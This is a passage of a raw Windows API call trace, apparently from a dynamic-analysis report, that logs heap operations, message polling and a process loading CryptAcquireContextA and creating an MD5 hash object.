lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0230.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0230.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0230.993] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0230.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0230.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0230.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0230.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0230.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69ba8 [0230.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0230.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0230.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0230.994] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0230.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0230.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0230.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.995] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0230.995] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.996] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.996] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.996] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.996] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.996] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0230.996] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0230.997] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0230.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0230.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.997] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.997] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0230.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.997] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.997] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0230.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0230.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.998] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0230.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0230.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.998] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.999] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0230.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.999] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0230.999] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0230.999] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.999] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0230.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0230.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.999] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.999] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0230.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0230.999] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.000] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0231.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0231.000] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.000] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0231.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0231.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.000] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0231.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0231.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51508, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0231.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.001] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0231.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0231.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0231.001] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0231.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0231.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0231.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0231.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.005] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0231.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0231.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0231.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0231.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0231.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 